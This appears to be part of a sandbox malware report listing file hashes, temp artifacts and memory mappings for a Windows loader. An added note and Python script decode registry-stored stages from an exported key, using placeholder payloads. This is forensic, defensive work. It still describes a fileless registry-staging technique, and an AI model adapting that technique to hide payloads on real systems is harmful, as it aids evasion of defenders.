SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/3696-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\CSCB25259DA0BF41C685C145E7B77F9D39.TMP

MD5 9ebd13fda96930a951c29c9803189680
SHA1 89a6da69cd5ca511ac20a150ef2849474513e647
SHA256 159f13f12ded6836e650aafe4ae2c8e4bb4c4e6e2d57d7aec584afa5830118b1
SHA512 9219145b9c53edd6ec84bb30cc9f7046e674355a0168f893337807d54fa6ebc5c53f7aedc4fab7cfc00ecc0179bfa0d33e778868791c8374e4cfc22f5bfa8a30

C:\Users\Admin\AppData\Local\Temp\RES9625.tmp

MD5 1ca03a1553f812f0678f5b98f50ea950
SHA1 c987674ceb9b3d027fb76bb53ed76afe05fe9f1b
SHA256 96d987b9edd809d181bbea3c6311a66bd9654a27dc1d4d35f05f40783aa446b3
SHA512 f132989e5f2eb20b61259544746eec2aad0aca903da18b3d0d646ef6dfc2c9f81b1b2a5031c50a2890b4b133bf03e19b494d816583fa255109862b1070851f48

C:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.dll

MD5 e116c9d2033d807e7e238b4ef1b62441
SHA1 fd4a8a21145c7f14175ddf512a5ae51fdbd5fd5d
SHA256 a4685e10bc3da377f654b68bd161c8bd97be457743fb2b6dba04ec5d47df03e9
SHA512 a852a55a7701571fa02b653fda04a682a83de09dcfc781a66f96e5eb927b0d45e0b775e00162eafd5127e2459c6c5abd03b9d8f08bda2ae629691d7d24d71229

memory/3472-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.cmdline

MD5 9ec4f73902f40ee643aaa0697b535eff
SHA1 7bea1ea1aceab43bfa0345aabc5936818b2229a9
SHA256 146619eb310e9d43a5d2c03943336d8fc77eb2d786b02c68082aa6ccc04a4cc9
SHA512 5489f12f36cfe5a0c6af91a0b2083dada40debeb7e20745c241f8ed24986c7d483ce18c19821e9e89c73be4196de9f20d6881df6066edc9da50522dca72aeb80

\??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/4788-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\CSC93A0155896EB444294CFA73FFC9517FC.TMP

MD5 007da9aaa12d1c816666f84ca72ec4f1
SHA1 34d50bd86ddf66c225bcd5ba9c14ffef879f018d
SHA256 36fdaee98e5341b537ec8c09357bdd90dcec22bb81b4b7e5782d0d85b29b8380
SHA512 a73d6892ad244b0cd638cf1203f0a60f1136fdc5fb1a499ff35bf3170428ef2f6ee9fd5998a101e9122f7352ecfd22ac0f33cdb220dad34b6fac1399a8b0e5d7

C:\Users\Admin\AppData\Local\Temp\RES96D1.tmp

MD5 9c1e57a168ffbe153f29f31014779080
SHA1 6388960cee0042722bde558269e7717a2a47651f
SHA256 3351f350fc93dbabef3b4ae0ef2a164b056c1d44a356cc4f5c3d851b7af609ae
SHA512 d0174befbb77cfcf4108362abeab7d116a1383a35cbfc183c41e057ec674f4831e79abf00f1bfcbefccca062a699d8df14a75ad64e990ba01aacf813dbe2fb5a

C:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.dll

MD5 929399503519dcbb0b02be8c65c3b3ca
SHA1 3b017d0db8bd09320e0523dc51388fd87ba6cd4d
SHA256 adbb52f5a1c2eac7517deaf63d3a59e345e66c07537bd8cda39944ebcc9e0639
SHA512 6c5845741449c8ac32b3364cdca8e037b7a8092cc5ec956a3fd5c3983ab90b637e79ed99ec669abb7955d3084d9b7b4c28e273ef0a25bcdbc6cc493432a91d6d

memory/2160-157-0x00007FFC24FB0000-0x00007FFC25A71000-memory.dmp

memory/2160-158-0x0000019673DE0000-0x0000019673E1D000-memory.dmp

memory/3452-159-0x0000026C226C0000-0x0000026C22763000-memory.dmp

memory/3752-160-0x000001415F550000-0x000001415F5F3000-memory.dmp

memory/1032-161-0x00000000085F0000-0x0000000008693000-memory.dmp

memory/4380-162-0x0000000000000000-mapping.dmp

memory/4148-163-0x0000000000000000-mapping.dmp

memory/4916-164-0x0000000000000000-mapping.dmp

memory/4912-165-0x0000000000000000-mapping.dmp

memory/4916-166-0x00000000009D6B20-0x00000000009D6B24-memory.dmp

memory/4916-167-0x00000000011E0000-0x0000000001276000-memory.dmp

memory/3408-168-0x0000000000000000-mapping.dmp

memory/4544-169-0x000001746F810000-0x000001746F8B3000-memory.dmp

memory/4476-170-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1308-172-0x0000000000000000-mapping.dmp

memory/1032-173-0x000000000A5D0000-0x000000000A70B000-memory.dmp

memory/1032-177-0x000000000A710000-0x000000000A84A000-memory.dmp

memory/2092-181-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 7127823022c7a932f96be727f3ddc34a
SHA1 a29cdec64f59727a5eaedf30cb98f5444aa4249d
SHA256 2afe6030d85ec57f1ac34b8f317ab0751a5a915da72a71b55d9adbdbd359618f
SHA512 2eb02688328b99d391c498fed2c0d56906c2d57d50bb1764c9c31764fbbda8104fdd5c3f8e416dc5c58881c4b849896c850a25b9c37390b9a449f6e214eb18b9

memory/2808-183-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 7127823022c7a932f96be727f3ddc34a
SHA1 a29cdec64f59727a5eaedf30cb98f5444aa4249d
SHA256 2afe6030d85ec57f1ac34b8f317ab0751a5a915da72a71b55d9adbdbd359618f
SHA512 2eb02688328b99d391c498fed2c0d56906c2d57d50bb1764c9c31764fbbda8104fdd5c3f8e416dc5c58881c4b849896c850a25b9c37390b9a449f6e214eb18b9

memory/5116-185-0x0000000000000000-mapping.dmp

memory/1032-186-0x00000000085F0000-0x0000000008693000-memory.dmp

memory/2328-187-0x0000000000000000-mapping.dmp

memory/1224-188-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 a5f20a41aab2cab03bd597d49d14f77e
SHA1 49366784d753ad7071d4a45682499d395fca5f25
SHA256 18bc37c219505ce44a8b8c77941eb2f901da13de2e4a7741b8efcf67e25bb121
SHA512 fa382a6f8a55a7553c112d243e9178f348b397a7af6dc5a66213641554dd28ee7074f4015615bcf9fd9f82ba7906b7fff953ab91de05e9d9368b7d4393a807b1

memory/1160-190-0x0000000000000000-mapping.dmp

memory/3956-191-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 b19ff771046a3c130ed5b585522e87f7
SHA1 dc7fbb6af7033c894904b51f855862723cdaa161
SHA256 73624a2761213f03c5bafdc9c5de10b915b96a365497af8ac3fc33a202bd414b
SHA512 5977853b1ae7eabe57d01e6cc3253cdb9ee9e7fa7a927c9f1af452f67b0fff404425f5eca29f5f7c7cf8ef54a473087cade26a3f17c88eced85c768baac73e1f

memory/3248-193-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 b19ff771046a3c130ed5b585522e87f7
SHA1 dc7fbb6af7033c894904b51f855862723cdaa161
SHA256 73624a2761213f03c5bafdc9c5de10b915b96a365497af8ac3fc33a202bd414b
SHA512 5977853b1ae7eabe57d01e6cc3253cdb9ee9e7fa7a927c9f1af452f67b0fff404425f5eca29f5f7c7cf8ef54a473087cade26a3f17c88eced85c768baac73e1f

memory/2860-195-0x0000000000000000-mapping.dmp

memory/3700-196-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 6d6a8b3f318fd3d8cef74f5a606d175b
SHA1 bbf142b78df2ef8bae740e28e29499f98f443144
SHA256 6c42afc4e424041bd3f8c7b6bd18cb969e3a556a013d045d0ee511e014913add
SHA512 3cd2beb275fd39a7ba74cbf71368ec36d9580826603f144488a0ddaba6cb0047a03f362915ce7e0ec81ee199d0af2f8f8e0a1ecab44b2433f12bbe3f03774b04

memory/3692-198-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 6d6a8b3f318fd3d8cef74f5a606d175b
SHA1 bbf142b78df2ef8bae740e28e29499f98f443144
SHA256 6c42afc4e424041bd3f8c7b6bd18cb969e3a556a013d045d0ee511e014913add
SHA512 3cd2beb275fd39a7ba74cbf71368ec36d9580826603f144488a0ddaba6cb0047a03f362915ce7e0ec81ee199d0af2f8f8e0a1ecab44b2433f12bbe3f03774b04

memory/3472-200-0x0000000000000000-mapping.dmp

memory/2120-201-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 f970ec5d20d2fba20631ebcd079bde53
SHA1 a68f1ea0ac316fecc6d140097950a86c203a48e4
SHA256 4edcdabe17008fb62ce6ab79154718ea0a638e6e663e72c8112898ead8948fa4
SHA512 9b43735db140856086ebb5ad7d1abfea163bdd1d7d4ccca289b661ccf6417d0be9f82e344d92b1893119d81013bff53f029c94fad28db983b287010459e042dd

memory/2336-203-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 f970ec5d20d2fba20631ebcd079bde53
SHA1 a68f1ea0ac316fecc6d140097950a86c203a48e4
SHA256 4edcdabe17008fb62ce6ab79154718ea0a638e6e663e72c8112898ead8948fa4
SHA512 9b43735db140856086ebb5ad7d1abfea163bdd1d7d4ccca289b661ccf6417d0be9f82e344d92b1893119d81013bff53f029c94fad28db983b287010459e042dd

memory/1556-205-0x0000000000000000-mapping.dmp

memory/1792-206-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 b14ca353fa4187bac21f5ab89ba9a11c
SHA1 fed2d6b01963a4aac5ec7942f5d7e09ca6ddf310
SHA256 0f629f4157821999e27bbd0f8fd0443d62589646daa6cbd165292a876194c943
SHA512 ba1c82cb93e0c33574c806a6680e2594e30d4af8c90379b36ae46199d4e19d9ba7a0eb46f1b120398c810f84ec673f12b164ef39049235bb4b12e0b6a1965905

memory/2140-208-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 714de7881b6a1035c086c517850de473
SHA1 2f7d0b5388ae3169c976b82a41a6463d83b2c635
SHA256 d14c84a41e44ae9c73535af482c1e7fae5db45c1400fab66f8b7dcec66ac900e
SHA512 4150c13a5c1b598965ad8cf5aa98d0e23405fecb7c2917598621c375fcaa7afeb22b1e588fb06ed1ab63b462a6ea8bfbebf56b7ff62290dba4bf35bdee6e79c9

memory/796-210-0x0000000000000000-mapping.dmp

memory/4252-211-0x0000000000000000-mapping.dmp

memory/4996-212-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 f598a0e91678e4a3ab5262f92a2fc126
SHA1 faf8e24e200debcb4ea8c1a5fc97d3428e0981c5
SHA256 e426336dfe2774f86b7cb3c1962a86d5eae6c7c22f4d4117edf3d819eda8bc3b
SHA512 199dfc3cf019979c8146c873d06b5e0b8a893db0adb0dc4e2e27231801b9e9ea47335144bd2357b81ab4ab1ed03e854020c84e41f2b45519e149255578bb1101

memory/1088-214-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 491781928626aa6de588e5e1e944e765
SHA1 38b2d33c01fc8fa99b7fa029d9cf54d803118030
SHA256 1031f0822bb6b82b229e312d363c79c6f513c5dd9eab88a545e8e897d5728571
SHA512 2118849ffbbfdb731041b3d05516083fe386541fadf2908eff0935620f8d4076e79581896465da11f74331d812c633c73da184f80e75343f3df7c3e9b7b75f8f

memory/3592-216-0x0000000000000000-mapping.dmp

memory/1124-217-0x0000000000000000-mapping.dmp

memory/1208-218-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 855fc1aa369e8cc7fce0b1957427918e
SHA1 20e2a9272e85fdc40a08cbf4dbba9e6d3d7f8fa4
SHA256 a6326c7a78fd3240e9ee70e2666ee60dcbbac5f24d642d9038a8075542009c20
SHA512 2b69fb54aa6fbba546c9339b5efbf675e3ba25f661158bf609ba63ca6f96241ff01aec9c34415a09b42606a6864ecdef941a767d1f3994845605c078ff45f11a

memory/2920-220-0x0000000000000000-mapping.dmp

memory/4356-221-0x0000000000000000-mapping.dmp

memory/4852-222-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 44d578ac531f2f93c3a515e3f72a4e62
SHA1 7517f39370ac5fc4a80c7572d3a5c15aebe0fb2f
SHA256 64b087f809be517e84779845447554cf9103bc52953202f330d84f24ae252838
SHA512 4bf075c425a9f4d6b5869e91ec533de5a2d15c8a1d8fb9b5c39f1b49b555629a4720ce65e4323bf6c84fd6b3083392e387ce7f6386b5f1c96280ef727d2b736d

memory/4476-224-0x0000000000000000-mapping.dmp

memory/3312-225-0x0000000000000000-mapping.dmp

memory/1704-226-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 561bef9af1d2b3cd08f865fe88ed8b87
SHA1 de383abc60321ffa36cb8d718bdc9205b4300764
SHA256 8f60e06f4a1d259c2cbe505612fa9b4972a8d04703f95ec9baa42d57e6d37463
SHA512 03da980c68887047560a3b305c23b9ffc067b1798bca12a94390af6573ce3d9acbd55c696bd602e83075bb599d61e32da1c7d5312a20c0ea3515207a3715820d

memory/696-228-0x0000000000000000-mapping.dmp

memory/1808-229-0x0000000000000000-mapping.dmp

memory/3952-230-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 6bd79a5adab7a3e2068c0427e0e4b70c
SHA1 d4159171c427cdd8e11336d21666960b3624f178
SHA256 bd253388681126be29d3a08fa47c2fd721512973ba6d50203a7b2791c9bc680b
SHA512 34736868d8e5bb606ad31c78ed82b57fdea35c9da8f4e02fa47f3a003d429ec56ee33fb1e0d2396c7d9e3c6f0d190d77045ac60fe39dcf30cebbcb41e9fff65e

C:\Users\Admin\AppData\Local\Temp\80C6.bin

MD5 6bd79a5adab7a3e2068c0427e0e4b70c
SHA1 d4159171c427cdd8e11336d21666960b3624f178
SHA256 bd253388681126be29d3a08fa47c2fd721512973ba6d50203a7b2791c9bc680b
SHA512 34736868d8e5bb606ad31c78ed82b57fdea35c9da8f4e02fa47f3a003d429ec56ee33fb1e0d2396c7d9e3c6f0d190d77045ac60fe39dcf30cebbcb41e9fff65e
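The registry key named in the mshta and PowerShell command lines in the Processes section (HKCU\Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974) is where this loader keeps its later stages, and it has no entry in the Files list above because nothing is written to disk for it; on a live host a `reg export` of that key is the artifact to collect. The Python below is an added example, not part of the report or the malware: it parses a regedit 5.00 export and decodes REG_BINARY values to ASCII, which is what the PowerShell stage does with ProcessOptions via [System.Text.Encoding]::ASCII.GetString. The .reg text in the block is constructed; only the key path and the value names ManagerMemory and ProcessOptions come from the report, and the payload bytes, the Client and Install values and the function names are placeholders chosen for the example.

```python
"""Added example (not part of the sandbox report): read the staging key named in
the mshta/PowerShell command lines out of a `reg export` file and decode its
REG_BINARY values to text, offline. SAMPLE_REG is constructed with placeholder
payloads; it is not the sample's real registry content."""
import re

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')

# Constructed export in regedit 5.00 layout (hex values wrap with a trailing backslash).
# Payload bytes spell "write-host 'constructed'" and "window.flag=1"; both are placeholders.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974]
"Client"=hex:00,ff,10,20
"Install"=dword:00000001
"ProcessOptions"=hex:77,72,69,74,65,2d,68,6f,73,74,20,27,63,6f,6e,73,74,72,75,63,\
  74,65,64,27
"ManagerMemory"=hex:77,69,6e,64,6f,77,2e,66,6c,61,67,3d,31
'''


def load_reg(path):
    """regedit 5.00 exports are UTF-16 with a BOM; older REGEDIT4 exports are ANSI."""
    with open(path, "rb") as f:
        raw = f.read()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("latin-1")


def decode_value(data):
    """Turn the right-hand side of a .reg value line into (type name, python value)."""
    if data.startswith('"') and data.endswith('"'):
        return ("REG_SZ", data[1:-1].replace('\\"', '"').replace("\\\\", "\\"))
    if data.startswith("dword:"):
        return ("REG_DWORD", int(data[6:], 16))
    m = re.match(r"hex(?:\(([0-9a-f]+)\))?:(.*)$", data, re.I)
    if m:
        kind = {None: "REG_BINARY", "2": "REG_EXPAND_SZ", "7": "REG_MULTI_SZ"}.get(
            m.group(1), "hex(%s)" % m.group(1))
        raw = bytes(int(b, 16) for b in m.group(2).split(",") if b)
        return (kind, raw)
    return ("UNKNOWN", data)


def parse_reg_export(text):
    """Return {key path: {value name: (type, value)}} for a .reg export."""
    result, current = {}, None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].rstrip()
        i += 1
        if not line or line.startswith("Windows Registry Editor") or line.startswith("REGEDIT4"):
            continue
        km = KEY_RE.match(line)
        if km:
            current = km.group(1)
            result[current] = {}
            continue
        vm = VALUE_RE.match(line)
        if not vm or current is None:
            continue
        name, data = vm.group(1), vm.group(2)
        while data.endswith("\\") and i < len(lines):  # join wrapped hex lines
            data = data[:-1] + lines[i].strip()
            i += 1
        result[current][name] = decode_value(data)
    return result


def printable_ascii(raw, min_len=8):
    """The blob as text if it is printable ASCII (what the PowerShell stage assumes), else None."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    ok = all(32 <= ord(c) < 127 or c in "\r\n\t" for c in text)
    return text if ok and len(text) >= min_len else None


def extract_stages(text, key_fragment="\\appdatalow\\software\\microsoft\\"):
    """Binary values under the per-GUID AppDataLow key that decode as script text."""
    out = {}
    for key, values in parse_reg_export(text).items():
        if key_fragment not in key.lower():
            continue
        for name, (kind, data) in values.items():
            if kind == "REG_BINARY":
                txt = printable_ascii(data)
                if txt is not None:
                    out[name] = txt
    return out


if __name__ == "__main__":
    for name, script in extract_stages(SAMPLE_REG).items():
        print(f"{name}: {script}")
```

Values that fail the ASCII check (as Client does here) are not necessarily benign; in this family the non-script values are typically encrypted and need the sample's key material, so keep the raw bytes from parse_reg_export alongside the decoded ones.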